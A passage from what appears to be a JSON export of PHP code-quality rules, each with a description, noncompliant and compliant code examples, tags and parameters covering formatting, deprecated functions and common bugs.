\"true\", \"false\", \"null\" should be lower case","htmlDesc":"<p>Using indifferently lower or upper case for PHP keywords and constants \"true\", \"false\" and \"null\" can impact the readability of PHP source\ncode.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n<?php ECHO 'Hello World'; ?>\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n<?php echo 'Hello World'; ?>\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1784","repo":"php","name":"Method visibility should be explicitly declared","htmlDesc":"<p>Class methods may be defined as public, private, or protected. Methods declared without any explicit visibility keyword are defined as public. To\nprevent any misunderstanding, this visibility should always be explicitly declared.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction foo(){...}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic function foo(){...}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1788","repo":"php","name":"Method arguments with default values should be last","htmlDesc":"<p>The ability to define default values for method arguments can make a method easier to use. Default argument values allow callers to specify as many\nor as few arguments as they want while getting the same functionality and minimizing boilerplate, wrapper code. <\/p>\n<p>But all method arguments with default values should be declared after the method arguments without default values. Otherwise, it makes it\nimpossible for callers to take advantage of defaults; they must re-specify the defaulted values in order to \"get to\" the non-default arguments.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction makeyogurt($type = \"acidophilus\", $flavor){...} \/\/ Noncompliant\n\nmakeyogurt(\"raspberry\")}} \/\/ Runtime error: Missing argument 2 in call to makeyogurt()\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction makeyogurt($flavor, $type = \"acidophilus\", ){...}\n\nmakeyogurt(\"raspberry\")}} \/\/ Works as expected\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1793","repo":"php","name":"\"elseif\" keyword should be used in place of \"else if\" keywords","htmlDesc":"<p>According to the PSR2 coding standard:<\/p>\n<blockquote>\n <p>The keyword <code>elseif<\/code> SHOULD be used instead of <code>else if<\/code> so that all control keywords look like single words.<\/p>\n<\/blockquote>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif ($expr1) {\n ...\n} else if ($expr2) {\n ...\n} else {...}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif ($expr1) {\n ...\n} elseif ($expr2) {\n ...\n} else {...}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1799","repo":"php","name":"\"exit(...)\" and \"die(...)\" statements should not be used","htmlDesc":"<p>The <code>exit(...)<\/code> and <code>die(...)<\/code> statements should absolutely not be used in Web PHP pages as this might lead to a very bad\nuser experience. In such case, the end user might have the feeling that the web site is down or has encountered a fatal error. <\/p>\n<p>But of course PHP can also be used to develop command line application and in such case use of <code>exit(...)<\/code> or <code>die(...)<\/code>\nstatement can be justified but must remain limited and not spread all over the application. We expect exceptions to be used to handle errors and those\nexceptions should be caught just before leaving the application to specify the exit code with help of <code>exit(...)<\/code> or <code>die(...)<\/code>\nstatements.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Foo {\n public function bar($param) {\n if ($param === 42) {\n exit(23);\n }\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Foo {\n public function bar($param) {\n if ($param === 42) {\n throw new Exception('Value 42 is not expected.');\n }\n }\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1808","repo":"php","name":"Source code should comply with formatting standards","htmlDesc":"<p>Shared coding conventions make it possible for a team to collaborate efficiently. This rule raises issues for failures to comply with formatting\nstandard. The default parameter values conform to the PSR2 standard.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default PSR2 parameter values:<\/p>\n<pre>\nuse FooClass;\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002 \/\/ Noncompliant; the \"use\" declaration should be placed after the \"namespace\" declaration\n\nnamespace Vendor\\Package;\nuse FooClass;\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002 \/\/ Noncompliant; the \"namespace\" declaration should be followed by a blank line\n$foo = 1;\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002 \/\/ Noncompliant; the \"use\" declaration should be followed by a blank line\n\nclass ClassA {\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002 \u2002 \u2002\/\/ Noncompliant; an open curly brace should be at the beginning of a new line for classes and functions\n\u2002\u2002function my_function(){ \u2002\/\/ Noncompliant; curly brace on wrong line\n\u2002\u2002\u2002\u2002if ($firstThing)\u2002\u2002\u2002\u2002\u2002\u2002\u2002\/\/ Noncompliant; an open curly brace should be at the end of line for a control structure\n\u2002\u2002\u2002\u2002{\n\u2002\u2002\u2002\u2002\u2002\u2002...\n\u2002\u2002\u2002\u2002}\n\n\u2002\u2002\u2002\u2002if ($secondThing)\u2002 {\u2002\/\/ Noncompliant; there should be exactly one space between the closing parenthesis and the opening curly brace\n\u2002\u2002\u2002\u2002\u2002\u2002...\n\u2002\u2002\u2002\u2002}\n\n if($thirdThing) { \/\/ Noncompliant; there should be exactly one space between the control structure keyword and the opening parenthesis\n ...\n }\n else { \/\/ Noncompliant; the close curly brace and the next \"else\" (or \"catch\" or \"finally\") keyword should be located on the same line\n ...\n }\n\n try{ \/\/ Noncompliant; there should be exactly one space between the control structure keyword and the curly brace\n ...\n } catch (Exception $e) {\n\u2002\u2002 }\n\n analyse( $fruit ) ; \/\/ Noncompliant; there should not be any space after the opening parenthesis and before the closing parenthesis\n\n for ($i = 0;$i < 10; $i++) { \/\/ Nomcompliant; there should be exactly one space after each \";\" in the {{for}} statement\n ...\n }\n\n pressJuice($apply ,$orange); \/\/ Noncompliant; the comma should be followed by one space and not preceded by any\n\n do_something (); \/\/ Noncompliant; there should not be any space after the method name\n\n foreach ($fruits as $fruit_key => $fruit) { \/\/ Noncompliant; in the foreach statement there should be one space before and after \"as\" keyword and \"=>\" operator\n ...\n }\n }\n}\n\nclass ClassB\nextends ParentClass \/\/ Noncompliant; the class name and the \"extends\" \/ \"implements\" keyword should be on the same line\n{\n ...\n}\n\nclass ClassC extends ParentClass implements \\ArrayAccess, \\Countable,\n \\Serializable \/\/ Noncompliant; the list of implemented interfaces should be correctly indented\n{\n\n public function aVeryLongMethodName(ClassTypeHint $arg1, \/\/ Noncompliant; the arguments in a method declaration should be correctly indented\n &$arg2, array $arg3 = []) {\n\n $noArgs_longVars = function () use ($longVar1, \/\/ Noncompliant; the arguments in a function declaration should be correctly indented\n $longerVar2,\n $muchLongerVar3\n ) {\n ...\n };\n\n $foo->bar($longArgument, \/\/ Noncompliant; the arguments in a method call should be correctly indented\n $longerArgument,\n $muchLongerArgument); \/\/ Noncompliant; the closing parenthesis should be placed on the next line\n\n $closureWithArgsAndVars = function($arg1, $arg2)use ($var1, $var2) { \/\/ Noncompliant; the closure declaration should be correctly spaced - see (5)\n ...\n };\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nnamespace Vendor\\Package; \/\/ Compliant; the \"namespace\" declaration is followed by a blank line\n\nuse FooClass; \/\/ Compliant; the \"use\" declaration is placed after the \"namespace\" declaration\n \/\/ Compliant; the \"use\" declaration is followed by a blank line\n$foo = 1;\n\nclass ClassA\n{\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002 \u2002\/\/ Compliant; the open curly brace is at the beginning of a new line for the class\n\u2002\u2002function my_function()\n {\u2002\u2002\u2002\u2002 \/\/ Compliant; the open curly brace is at the beginning of a new line for the function\n\u2002\u2002\u2002\u2002if ($firstThing)\u2002{\u2002\u2002\u2002\u2002\/\/ Compliant; the open curly brace is at the end of line for the control structure\n\u2002\u2002\u2002\u2002\u2002\u2002...\n\u2002\u2002\u2002\u2002}\n\n\u2002\u2002\u2002\u2002if ($secondThing)\u2002{\u2002\u2002 \/\/ Compliant; there is exactly one space between the closing parenthesis and the opening curly brace\n\u2002\u2002\u2002\u2002\u2002\u2002...\n\u2002\u2002\u2002\u2002}\n\n if ($thirdThing) { \/\/ Compliant; there is exactly one space between the control structure keyword and the opening parenthesis\n ...\n } else { \/\/ Compliant; the close curly brace and the next \"else\" (or \"catch\" or \"finally\") keyword are located on the same line\n ...\n }\n\n try { \/\/ Compliant; there is exactly one space between the control structure keyword and the curly brace\n ...\n } catch (Exception $e) {\n ...\n }\n\n analyse($fruit); \/\/ Compliant: there is no space after the opening parenthesis, nor before the closing parenthesis\n\n for ($i = 0; $i < 10; $i++) { \/\/ Compliant: there is exactly one space after each \";\" in the {{for}} statement\n ...\n }\n\n pressJuice($apply, $orange); \/\/ Compliant; the comma is followed by one space and is not preceded by any\n\n do_something(); \/\/ Compliant; there is no space after the method name\n\n foreach ($fruits as $fruit_key => $fruit) { \/\/ Compliant; in the foreach statement there is one space before and after \"as\" keyword and \"=>\" operator\n ...\n }\n }\n}\n\n\/* The idea here is to make it obvious at first glance that a class extends\n * some other classes and\/or implements some interfaces. The names of\n * extended classes or implemented interfaces can be located on subsequent lines.\n *\/\nclass ClassB1 extends ParentClass \/\/ Compliant; the class name and the \"extends\" (or \"implements\") keyword are located on the same line\n{\n ...\n}\n\nclass ClassB2 extends \/\/ Compliant; the class name and the \"extends\" (or \"implements\") keyword are located on the same line\nParentClass {\n ...\n}\n\n\/* Lists of implements may be split across multiple lines, where each subsequent line\n * is indented once. When doing so, the first item in the list should be on the next line,\n * and there should be only one interface per line.\n *\/\nclass ClassC extends ParentClass implements\n \\ArrayAccess, \/\/ Compliant; the list of implemented interfaces is correctly indented\n \\Countable,\n \\Serializable\n{\n \/* Argument lists may be split across multiple lines, where each subsequent line\n * is indented once. When doing so, the first item in the list should be on the next line,\n * and there should be only one argument per line. Also, when the argument list is\n * split across multiple lines, the closing parenthesis and opening brace should be\n * placed together on their own line with one space between them.\n *\/\n public function aVeryLongMethodName(\n ClassTypeHint $arg1, \/\/ Compliant; the arguments in a method\/function declaration are correctly indented\n &$arg2,\n array $arg3 = []\n ) {\n $noArgs_longVars = function () use (\n $longVar1, \/\/ Compliant; the arguments in a method\/function declaration are correctly indented\n $longerVar2,\n $muchLongerVar3\n ) {\n ...\n };\n\n\n \/* Argument lists may be split across multiple lines, where each subsequent line is\n * indented once. When doing so, the first item in the list should be on the next line,\n * and there should be only one argument per line.\n *\/\n $foo->bar(\n $longArgument, \/\/ Compliant; the arguments in the method call are be correctly indented\n $longerArgument,\n $muchLongerArgument\n ); \/\/ Compliant; the closing parenthesis is placed on a separate line\n\n \/* Closures should be declared with a space after the \"function\" keyword,\n * and a space before and after the \"use\" keyword.\n *\/\n $closureWithArgsAndVars = function ($arg1, $arg2) use ($var1, $var2) { \/\/ Compliant; the closure declaration is correctly spaced\n ...\n };\n }\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[{"key":"extends_implements_line","htmlDesc":"Class names, "extends" and "implements" keywords should be located on the same line","defaultValue":"true","type":"BOOLEAN"},{"key":"no_space_method_name","htmlDesc":"There should not be any space after a method name","defaultValue":"true","type":"BOOLEAN"},{"key":"closure_format","htmlDesc":"Closures declaration should be correctly spaced","defaultValue":"true","type":"BOOLEAN"},{"key":"space_comma","htmlDesc":"Commas should be followed by one space and not preceded by any","defaultValue":"true","type":"BOOLEAN"},{"key":"open_curly_brace_classes_functions","htmlDesc":"Open curly braces should be at the beginning of a new line for classes and functions","defaultValue":"true","type":"BOOLEAN"},{"key":"namespace_blank_line","htmlDesc":""namespace" declarations should be followed by a blank line","defaultValue":"true","type":"BOOLEAN"},{"key":"open_curly_brace_control_structures","htmlDesc":"Open curly braces should be at the end of line for control structures","defaultValue":"true","type":"BOOLEAN"},{"key":"one_space_after","htmlDesc":"There should be exactly one space between closing parenthesis and opening curly braces","defaultValue":"true","type":"BOOLEAN"},{"key":"interfaces_indentation","htmlDesc":"List of implemented interfaces should be correctly indented","defaultValue":"true","type":"BOOLEAN"},{"key":"foreach_space","htmlDesc":"In foreach statement there should be one space before and after "as" keyword and "=>" operator","defaultValue":"true","type":"BOOLEAN"},{"key":"no_space","htmlDesc":"There should not be any space after the opening parenthesis and before the closing parenthesis","defaultValue":"true","type":"BOOLEAN"},{"key":"function_calls_arguments_indentation","htmlDesc":"Arguments in method\/function calls should be correctly indented","defaultValue":"true","type":"BOOLEAN"},{"key":"closing_curly_brace","htmlDesc":"Close curly brace and the next "else", "catch" and "finally" keywords should be located on the same line","defaultValue":"true","type":"BOOLEAN"},{"key":"function_declaration_arguments_indentation","htmlDesc":"Arguments in method\/function declarations should be correctly indented","defaultValue":"true","type":"BOOLEAN"},{"key":"use_blank_line","htmlDesc":""use" declarations should be followed by a blank line","defaultValue":"true","type":"BOOLEAN"},{"key":"one_space_for","htmlDesc":"There should be one space after each ";" in "for" statement","defaultValue":"true","type":"BOOLEAN"},{"key":"use_after_namespace","htmlDesc":""use" declarations should be placed after "namespace" declarations","defaultValue":"true","type":"BOOLEAN"},{"key":"one_space_before","htmlDesc":"There should be exactly one space between control structure keyword and opening parenthesis or curly brace","defaultValue":"true","type":"BOOLEAN"}],"type":"CODE_SMELL"},{"key":"php:S1848","repo":"php","name":"Objects should not be created to be dropped immediately without being used","htmlDesc":"<p>There is no good reason to create a new object to not do anything with it. Most of the time, this is due to a missing piece of code and so could\nlead to an unexpected behavior in production.<\/p>\n<p>If it was done on purpose because the constructor has side-effects, then that side-effect code should be moved into a separate, static method and\ncalled directly.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif ($x < 0) {\n new foo; \/\/ Noncompliant\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$var = NULL;\nif ($x < 0) {\n $var = new foo;\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1862","repo":"php","name":"Related \"if\/else if\" statements and \"cases\" in a \"switch\" should not have the same condition","htmlDesc":"<p>A <code>switch<\/code> and a chain of <code>if<\/code>\/<code>else if<\/code> statements is evaluated from top to bottom. At most, only one branch will\nbe executed: the first one with a condition that evaluates to <code>true<\/code>.<\/p>\n<p>Therefore, duplicating a condition automatically leads to dead code. Usually, this is due to a copy\/paste error. At best, it's simply dead code and\nat worst, it's a bug that is likely to induce further bugs as the code is maintained, and obviously it could lead to unexpected behavior.<\/p>\n<p>For a <code>switch<\/code>, if the first case ends with a <code>break<\/code>, the second case will never be executed, rendering it dead code. Worse\nthere is the risk in this situation that future maintenance will be done on the dead case, rather than on the one that's actually used.<\/p>\n<p>On the other hand, if the first case does not end with a <code>break<\/code>, both cases will be executed, but future maintainers may not notice\nthat.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif ($param == 1)\n openWindow();\nelse if ($param == 2)\n closeWindow();\nelse if ($param == 1) \/\/ Noncompliant\n moveWindowToTheBackground();\n\n\nswitch($i) {\n case 1:\n \/\/...\n break;\n case 3:\n \/\/...\n break;\n case 1: \/\/ Noncompliant\n \/\/...\n break;\n default:\n \/\/ ...\n break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif ($param == 1)\n openWindow();\nelse if ($param == 2)\n closeWindow();\nelse if ($param == 3)\n moveWindowToTheBackground();\n\nswitch($i) {\n case 1:\n \/\/...\n break;\n case 3:\n \/\/...\n break;\n default:\n \/\/ ...\n break;\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n executed <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1871","repo":"php","name":"Two branches in the same conditional structure should not have exactly the same implementation","htmlDesc":"<p>Having two <code>cases<\/code> in the same <code>switch<\/code> statement or branches in the same <code>if<\/code> structure with the same\nimplementation is at best duplicate code, and at worst a coding error. If the same logic is truly needed for both instances, then in an\n<code>if<\/code> structure they should be combined, or for a <code>switch<\/code>, one should fall through to the other. <\/p>\n<p>Moreover when the second and third operands of a ternary operator are the same, the operator will always return the same value regardless of the\ncondition. Either the operator itself is pointless, or a mistake was made in coding it.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch ($i) {\n case 1:\n doSomething();\n break;\n case 2:\n doSomethingDifferent();\n break;\n case 3: \/\/ Noncompliant; duplicates case 1's implementation\n doSomething();\n break;\n default:\n doTheRest();\n}\n\nif ($a >= 0 && $a < 10) {\n doTheThing();\nelse if ($a >= 10 && $a < 20) {\n doTheOtherThing();\n}\nelse if ($a >= 20 && $a < 50) {\n doTheThing(); \/\/ Noncompliant; duplicates first condition\n}\nelse {\n doTheRest();\n}\n\nif ($b == 0) {\n doOneMoreThing();\n}\nelse {\n doOneMoreThing(); \/\/ Noncompliant; duplicates then-branch\n}\n\nvar b = a ? 12 > 4 : 4; \/\/ Noncompliant; always results in the same value\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch ($i) {\n case 1:\n case 3:\n doSomething();\n break;\n case 2:\n doSomethingDifferent();\n break;\n default:\n doTheRest();\n}\n\nif (($a >= 0 && $a < 10) || ($a >= 20 && $a < 50)) {\n doTheThing();\nelse if ($a >= 10 && $a < 20) {\n doTheOtherThing();\n}\nelse {\n doTheRest();\n}\n\ndoOneMoreThing();\n\nb = 4;\n<\/pre>\n<p>or <\/p>\n<pre>\nswitch ($i) {\n case 1:\n doSomething();\n break;\n case 2:\n doSomethingDifferent();\n break;\n case 3:\n doThirdThing();\n break;\n default:\n doTheRest();\n}\n\nif ($a >= 0 && $a < 10) {\n doTheThing();\nelse if ($a >= 10 && $a < 20) {\n doTheOtherThing();\n}\nelse if ($a >= 20 && $a < 50) {\n doTheThirdThing();\n}\nelse {\n doTheRest();\n}\n\nif ($b == 0) {\n doOneMoreThing();\n}\nelse {\n doTheRest();\n}\n\nint b = a ? 12 > 4 : 8;\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1996","repo":"php","name":"Files should contain only one top-level class or interface each","htmlDesc":"<p>A file that grows too much tends to aggregate too many responsibilities and inevitably becomes harder to understand and therefore to maintain. This\nis doubly true for a file with multiple top-level classes and interfaces. It is strongly advised to divide the file into one top-level class or\ninterface per file.<\/p>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1997","repo":"php","name":"Files should not contain inline HTML","htmlDesc":"<p>Shared coding conventions allow teams to collaborate efficiently. To avoid the confusion that can be caused by tangling two coding languages in the\nsame file, inline HTML should be avoided.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n<?php\n$name = \"George\";\n?>\n<p> Hello <?php echo $name ?>!<\/p>\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>File having the extension <code>.phtml<\/code> are ignored by this rule because they are expected to have mixed PHP and HTML.<\/p>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1998","repo":"php","name":"References should not be passed to function calls","htmlDesc":"<p>Passing a reference to a function parameter means that any modifications the method makes to the parameter will be made to the original value as\nwell, since references have the effect of pointing two variables at the same memory space. This feature can be difficult to use correctly,\nparticularly if the callee is not expecting a reference, and the improper use of references in function calls can make code less efficient rather than\nmore efficient. <\/p>\n<p>Further, according to the PHP manual: <\/p>\n<blockquote>\n As of PHP 5.3.0, you will get a warning saying that \"call-time pass-by-reference\" is deprecated... And as of PHP 5.4.0, call-time pass-by-reference\n was removed, so using it will raise a fatal error.\n<\/blockquote>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nmyfun(&$name); \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nmyfun($name);\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/374\">MITRE, CWE-374<\/a> - Weakness Base Passing Mutable Objects to an Untrusted Method <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2000","repo":"php","name":"Files should not contain characters before \"<?php\"","htmlDesc":"<p>Having characters before <code><?php<\/code> can cause \"Cannot modify header information\" errors and similar problems with Ajax requests.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\ntest<?php \/\/Noncompliant\n\/\/ ...\n<\/pre>\n<p>and<\/p>\n<pre>\n\/\/ Noncompliant; newline before opening tag\n<?php\n\/\/ ...\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n<?php\n\/\/ ...\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2001","repo":"php","name":"Functions deprecated in PHP 5 should not be used","htmlDesc":"<p>Deprecated language features are those that have been retained temporarily for backward compatibility, but which will eventually be removed from\nthe language. In effect, deprecation announces a grace period to allow the smooth transition from the old features to the new ones. In that period, no\nuse of the deprecated features should be added to the code, and all existing uses should be gradually removed.<\/p>\n<p>The following functions were deprecated in PHP 5:<\/p>\n<table>\n <tbody>\n <tr>\n <th>Deprecated<\/th>\n <th>Use Instead<\/th>\n <\/tr>\n <tr>\n <td><code>call_user_method()<\/code><\/td>\n <td><code>call_user_func()<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>call_user_method_array()<\/code><\/td>\n <td><code>call_user_func_array()<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>define_syslog_variables()<\/code><\/td>\n <td><\/td>\n <\/tr>\n <tr>\n <td><code>dl()<\/code><\/td>\n <td><\/td>\n <\/tr>\n <tr>\n <td><code>ereg()<\/code><\/td>\n <td><code>preg_match()<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>ereg_replace()<\/code><\/td>\n <td><code>preg_replace()<\/code> (note that this is deprecated in PHP 5.5)<\/td>\n <\/tr>\n <tr>\n <td><code>eregi()<\/code><\/td>\n <td><code>preg_match()<\/code> with 'i' modifier<\/td>\n <\/tr>\n <tr>\n <td><code>eregi_replace()<\/code><\/td>\n <td><code>preg_replace()<\/code> with 'i' modifier<\/td>\n <\/tr>\n <tr>\n <td><code>set_magic_quotes_runtime()<\/code> and its alias, <code>magic_quotes_runtime()<\/code><\/td>\n <td><\/td>\n <\/tr>\n <tr>\n <td><code>session_register()<\/code><\/td>\n <td><code>$_SESSION<\/code> superglobal<\/td>\n <\/tr>\n <tr>\n <td><code>session_unregister()<\/code><\/td>\n <td><code>$_SESSION<\/code> superglobal<\/td>\n <\/tr>\n <tr>\n <td><code>session_is_registered()<\/code><\/td>\n <td><code>$_SESSION<\/code> superglobal<\/td>\n <\/tr>\n <tr>\n <td><code>set_socket_blocking()<\/code><\/td>\n <td><code>stream_set_blocking()<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>split()<\/code><\/td>\n <td><code>preg_split()<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>spliti()<\/code><\/td>\n <td><code>preg_split()<\/code> with 'i' modifier<\/td>\n <\/tr>\n <tr>\n <td><code>sql_regcase()<\/code><\/td>\n <td><\/td>\n <\/tr>\n <tr>\n <td><code>mysql_db_query()<\/code><\/td>\n <td><code>mysql_select_db()<\/code> and <code>mysql_query()<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>mysql_escape_string()<\/code><\/td>\n <td><code>mysql_real_escape_string()<\/code><\/td>\n <\/tr>\n <tr>\n <td>Passing locale category names as strings<\/td>\n <td>Use the LC_* family of constants<\/td>\n <\/tr>\n <\/tbody>\n<\/table>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2002","repo":"php","name":"Errors should not be silenced","htmlDesc":"<p>Just as pain is your body's way of telling you something is wrong, errors are PHP's way of telling you there's something you need to fix. Neither\npain, nor PHP errors should be ignored.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n@doSomethingDangerous($password); \/\/ Noncompliant; '@' silences errors from function call\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\ndoSomethingDangerous($password);\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2003","repo":"php","name":"\"require_once\" and \"include_once\" should be used instead of \"require\" and \"include\"","htmlDesc":"<p>At root, <code>require<\/code>, <code>require_once<\/code>, <code>include<\/code>, and <code>include_once<\/code> all perform the same task of\nincluding one file in another. However, the way they perform that task differs, and they should not be used interchangeably.<\/p>\n<p><code>require<\/code> includes a file but generates a fatal error if an error occurs in the process.<\/p>\n<p><code>include<\/code> also includes a file, but generates only a warning if an error occurs.<\/p>\n<p>Predictably, the difference between <code>require<\/code> and <code>require_once<\/code> is the same as the difference between <code>include<\/code>\nand <code>include_once<\/code> - the \"_once\" versions ensure that the specified file is only included once. <\/p>\n<p>Because including the same file multiple times could have unpredictable results, the \"once\" versions are preferred.<\/p>\n<p>Because <code>include_once<\/code> generates only warnings, it should be used only when the file is being included conditionally, i.e. when all\npossible error conditions have been checked beforehand.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\ninclude 'code.php'; \/\/Noncompliant; not a \"_once\" usage and not conditional\ninclude $user.'_history.php'; \/\/ Noncompliant\nrequire 'more_code.php'; \/\/ Noncompliant; not a \"_once\" usage\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nrequire_once 'code.php';\nif (is_member($user)) {\n include_once $user.'_history.php';\n}\nrequire_once 'more_code.php';\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2004","repo":"php","name":"Functions should not be nested too deeply","htmlDesc":"<p>Nesting functions can quickly turn your code into \"spaghetti code\". Such code is hard to read, refactor and therefore to maintain.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default threshold of 3:<\/p>\n<pre>\nfunction f () {\n function f_inner () {\n function f_inner_inner() {\n function f_inner_inner_inner() { \/\/ Noncompliant\n }\n }\n }\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[{"key":"max","defaultValue":"3","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S2005","repo":"php","name":"String literals should not be concatenated","htmlDesc":"<p>There is no reason to concatenate literal strings. Doing so is an exercise in reducing code readability. Instead, the strings should be\ncombined.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$msg = \"Hello \" . \"${name}\" . \"!\"; \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$msg = \"Hello ${name}!\";\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2007","repo":"php","name":"Functions and variables should not be defined outside of classes","htmlDesc":"<p>Defining and using global variables and global functions, when the convention dictates OOP can be confusing and difficult to use properly for\nmultiple reasons:<\/p>\n<ul>\n <li> You run the risk of name clashes. <\/li>\n <li> Global functions must be stateless, or they can cause difficult-to-track bugs. <\/li>\n <li> Global variables can be updated from anywhere and may no longer hold the value you expect. <\/li>\n <li> It is difficult to properly test classes that use global functions. <\/li>\n<\/ul>\n<p>Instead of being declared globally, such variables and functions should be moved into a class, potentially marked <code>static<\/code>, so they can\nbe used without a class instance. <\/p>\n<p>This rule checks that only object-oriented programming is used and that no functions or procedures are declared outside of a class.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n<?php\n\n$name = \"Bob\"; \/\/ Noncompliant\n\nfunction doSomething($arg) { \/\/ Noncompliant\n \/\/...\n}\n\nclass MyClass {\n \/\/...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n<?php\nclass MyClass {\n\n public static $name = \"Bob\"; \/\/ Compliant\n\n public static function doSomething($arg) { \/\/ Compliant\n \/\/...\n }\n \/\/...\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2010","repo":"php","name":"\"&&\" and \"||\" should be used","htmlDesc":"<p>PHP has two sets of logical operators: <code>&&<\/code> \/ <code>||<\/code>, and <code>and<\/code> \/ <code>or<\/code>. The difference between\nthe sets is precedence. Because <code>and<\/code> \/ <code>or<\/code> have a lower precedence than almost any other operator, using them instead of\n<code>&&<\/code> \/ <code>||<\/code> may not have the result you expect.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$have_time = true;\n$have_money = false;\n$take_vacation = $have_time and $have_money; \/\/ Noncompliant. $take_vacation == true.\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$have_time = true;\n$have_money = false;\n$take_vacation = $have_time && $have_money; \/\/ $take_vacation == false.\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2011","repo":"php","name":"\"global\" should not be used","htmlDesc":"<p>Global variables are a useful construct, but they should not be abused. Functions can access the global scope either through the\n<code>global<\/code> keyword or though the <code>$GLOBALS<\/code> array, but these practices considerably reduce the function's readability and\nreusability. Instead, the global variable should be passed as a parameter to the function.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$myGlobalVariable;\n\nfunction foo()\n{\n global $myGlobalVariable; \/\/ Noncompliant\n $GLOBALS['myGlobalVariable']; \/\/ Noncompliant\n \/\/ 